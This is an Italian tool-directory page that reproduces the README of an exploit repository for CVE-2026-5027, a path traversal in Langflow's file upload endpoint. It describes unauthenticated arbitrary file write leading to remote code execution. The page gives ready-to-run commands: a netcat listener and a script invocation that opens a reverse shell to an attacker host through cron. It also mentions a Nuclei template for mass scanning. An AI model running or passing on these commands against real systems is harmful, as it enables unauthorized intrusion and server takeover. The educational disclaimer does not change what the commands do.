Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-5027 — CVE-2026-5027 | Kitploit
Strumenti/GitHubGitHub/0xblackash/cve-2026-5027
Generazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e FormazioneRed Teaming
GitHub0xblackash/cve-2026-5027

CVE-2026-5027

CVE-2026-5027

Vedi Repository
4 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

🔥 CVE-2026-5027 - Path Traversal in Langflow

Vulnerabilità informatica: exploit di path traversal

Scrittura Arbitraria di File verso RCE
Esecuzione Remota di Codice non Autenticata tramite Upload di File

CVE CVSS Exploit

📌 Panoramica

Langflow presenta una vulnerabilità critica di path traversal nell'endpoint di upload file (POST /api/v2/files).

Un attaccante può inviare un nome di file malizioso contenente sequenze ../ per scrivere file arbitrari ovunque nel filesystem del server.

Questo porta facilmente a una piena esecuzione di codice remoto (RCE) — ad esempio inserendo una webshell o modificando il crontab.


🛠️ Funzionalità

  • ✅ Sfruttamento non autenticato (configurazioni di auto-login predefinite)
  • ✅ Semplice Proof-of-Concept (scrive un file di test in /tmp)
  • ✅ Reverse Shell completa tramite cron (Linux)
  • ✅ Template Nuclei incluso per scansioni di massa
  • ✅ Facile personalizzazione della profondità di traversal

🚀 Avvio Rapido

1. Proof of Concept (Test Sicuro)

root@kitploit:~
python3 CVE-2026-5027.py -t http://target:7860/ --proof

Output previsto se vulnerabile:

root@kitploit:~
[+] Success! File written: ../../../tmp/CVE-2026-5027-proof.txt

2. Reverse Shell Completa

root@kitploit:~
# Avvia il listener
nc -lvnp 4444

# Esegui l'exploit
python3 CVE-2026-5027.py -t http://target:7860/ --lhost YOUR_IP --lport 4444

📁 Contenuto del Repository

FileDescrizione
CVE-2026-5027.pyExploit Python principale (PoC + RCE)
CVE-2026-5027.yamlTemplate Nuclei per la scansione
README.mdQuesto file

🎯 Esempi di Utilizzo

cve-2026-5027

Modalità Proof

root@kitploit:~
python3 CVE-2026-5027.py -t http://target.com/ --proof

Modalità Reverse Shell

root@kitploit:~
python3 CVE-2026-5027.py -t http://target.com/ --lhost 192.168.1.100 --lport 4444

⚠️ Disclaimer

Questo repository è destinato solo a scopo educativo e a test di sicurezza autorizzati.

Usalo in modo responsabile e solo su sistemi per cui hai esplicito permesso di test.


Realizzato con ❤️ per la community red team

Scarica lo strumento